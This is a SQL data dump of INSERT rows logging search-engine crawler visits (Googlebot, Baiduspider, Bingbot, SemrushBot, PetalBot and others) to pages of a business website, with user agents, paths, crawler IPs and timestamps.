INSERT INTO `ey_weapp_spider_visit` VALUES ('95313', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_5.html', '220.181.108.174', '1660745930', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95315', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/152.html', '216.244.66.194', '1660747435', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95335', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_26.html', '185.191.171.6', '1660757617', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95316', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/209.html', '116.179.32.150', '1660748338', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95317', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/jbzxw/', '185.191.171.25', '1660748938', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95334', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/contact', '185.191.171.2', '1660757235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95318', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_59/', '66.249.79.108', '1660749384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95331', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/99.html', '216.244.66.194', '1660755813', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95320', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/gongsijianjie/', '207.46.13.215', '1660749960', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95323', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.112', '1660751609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95330', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.112', '1660755018', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95324', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/56.html', '185.191.171.2', '1660751699', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95325', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/message/', '54.161.41.102', '1660752708', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95326', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/products/81.html', '54.161.41.102', '1660752712', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95328', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_59/', '66.249.79.110', '1660753394', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95332', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/198.html', '66.249.79.108', '1660756237', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95344', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.110', '1660762022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95345', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/397.html', '185.191.171.15', '1660762987', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95346', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jns.html', '114.119.151.155', '1660763375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95351', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660765979', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95354', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660767653', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95355', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/493.html', '114.119.151.155', '1660768810', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95356', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/24_4.html', '185.191.171.21', '1660770472', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95359', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660771266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95361', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/177.html', '66.249.79.110', '1660772960', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95400', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/21_2.html', '185.191.171.16', '1660798690', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95401', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660798873', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95362', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/29.html', '220.181.108.101', '1660772961', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95363', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/101.html', '185.191.171.42', '1660773594', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95398', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.91', '1660798458', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95399', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.76', '1660798535', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95364', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_69/', '185.191.171.35', '1660773675', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95397', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_2.html', '185.191.171.36', '1660797896', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95365', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_18.html', '220.181.108.90', '1660774926', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95396', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/80.html', '116.179.32.206', '1660797217', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95366', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/tbxw/', '17.121.115.44', '1660775659', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95395', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/', '220.181.108.102', '1660794725', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95367', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_34.html', '220.181.108.155', '1660776890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95368', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1660777004', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95369', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/173.html', '114.119.151.153', '1660777328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95393', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/457.html', '116.179.32.241', '1660794724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95394', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/20_2.html', '116.179.32.111', '1660794725', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95370', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/303.html', '114.119.151.153', '1660777905', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95371', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/26.html', '185.191.171.15', '1660778695', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95374', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/52_2.html', '185.191.171.18', '1660780596', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95375', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_35/', '220.181.108.178', '1660780817', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95376', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/56.html', '216.244.66.194', '1660781045', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95377', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/147.html', '185.191.171.22', '1660782633', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95379', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/120.html', '185.191.171.18', '1660782803', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95392', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/410.html', '185.191.171.44', '1660793433', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95380', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660783723', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95391', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_3/', '220.181.108.155', '1660792761', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95381', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html', '/', '103.159.64.202', '1660784654', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95382', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/tags/106.html', '207.46.13.52', '1660786555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95389', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/118.html', '116.179.32.154', '1660790797', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95390', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/248.html', '185.191.171.11', '1660791937', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95383', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/jiaruwomen', '66.249.79.112', '1660786644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95384', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_28/', '116.179.32.98', '1660788028', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95385', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1660788116', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95386', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/289.html', '66.249.79.108', '1660789722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95387', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/452.html', '185.191.171.36', '1660790696', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95388', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/57.html', '66.249.79.108', '1660790790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95403', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.118', '1660799662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95412', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/170.html', '114.119.151.153', '1660801530', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95405', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/278.html', '207.46.13.52', '1660800226', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95417', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/93.html', '185.191.171.18', '1660802042', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95406', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hengyang.html', '114.119.151.155', '1660800574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95407', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.19', '1660800621', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95408', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tuobengal/', '185.191.171.5', '1660800710', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95409', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/pzhs.html', '114.119.151.155', '1660800803', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95425', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_15.html', '220.181.108.80', '1660808098', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95410', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/435.html', '114.119.151.153', '1660800936', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95415', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/157.html', '114.119.151.155', '1660801845', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95413', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/367.html', '185.191.171.17', '1660801641', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95416', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/157.html', '185.191.171.3', '1660802022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95431', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_18.html', '185.191.171.12', '1660814398', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95418', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/367.html', '220.181.108.82', '1660803588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95419', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/', '157.55.39.41', '1660803907', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95420', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/mas.html', '114.119.151.153', '1660804724', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95424', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9.html', '185.191.171.12', '1660808030', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95427', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/354.html', '207.46.13.52', '1660809050', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95433', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_3.html', '185.191.171.39', '1660815312', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95429', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/346.html', '207.46.13.59', '1660811938', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95430', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_3.html', '116.179.32.102', '1660813854', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95438', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/443.html', '185.191.171.10', '1660822483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95432', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660814845', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95444', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/322.html', '185.191.171.17', '1660823890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95436', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/55.html', '185.191.171.26', '1660818966', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95439', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1660822832', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95434', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/31_10.html', '185.191.171.25', '1660816516', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95435', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/349.html', '216.244.66.194', '1660817736', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95437', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/99.html', '185.191.171.34', '1660820598', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95440', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1660822833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95443', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/138.html', '185.191.171.19', '1660823735', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95450', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_16/', '185.191.171.23', '1660828177', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95455', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/case/234.html', '207.46.13.215', '1660830968', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95462', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/462.html', '66.249.79.110', '1660833162', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95603', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_8.html', '185.191.171.20', '1660924106', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95579', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xhq.html', '114.119.151.153', '1660903366', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95463', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '140.237.242.126', '1660833284', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95465', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yp.html', '114.119.151.153', '1660833834', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95467', '4', 'mozilla/5.0 (iphone; cpu iphone os 11_0 like mac os x) applewebkit/604.1.34 (khtml, like gecko) version/11.0 mobile/15a5341f safari/604.1;360spider', '/', '42.236.10.108', '1660834823', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95466', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/420.html', '185.191.171.7', '1660834778', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95469', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_33/', '116.179.32.133', '1660835599', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95470', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/20_4.html', '185.191.171.39', '1660836613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95475', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/483.html', '185.191.171.34', '1660838401', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95477', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/194.html', '66.249.79.108', '1660840087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95472', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/176.html', '116.179.32.154', '1660837563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95473', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/160.html', '220.181.108.167', '1660837563', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95474', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/135_2.html', '185.191.171.17', '1660838171', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95476', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/467.html', '66.249.79.108', '1660839682', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96537', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/108.html', '220.181.108.94', '1661352576', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96531', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/126.html', '185.191.171.25', '1661349513', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96534', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/196.html', '216.244.66.194', '1661350349', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96535', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/441.html', '185.191.171.38', '1661351993', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96544', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/158.html', '220.181.108.104', '1661358303', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96546', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/217.html', '216.244.66.194', '1661358881', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96554', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/148.html', '66.249.79.108', '1661361122', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96555', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_12.html', '185.191.171.10', '1661361322', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97015', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/180.html', '185.191.171.43', '1661556038', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96556', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/17.html', '220.181.108.167', '1661361575', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97012', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661554805', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97014', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/120.html', '216.244.66.194', '1661555049', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96557', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/yuhuataiqu.html', '114.119.151.153', '1661362447', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96558', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/418.html', '216.244.66.194', '1661362639', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97011', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/303.html', '66.249.79.110', '1661554796', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96560', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/84.html', '114.119.151.153', '1661362926', '0');
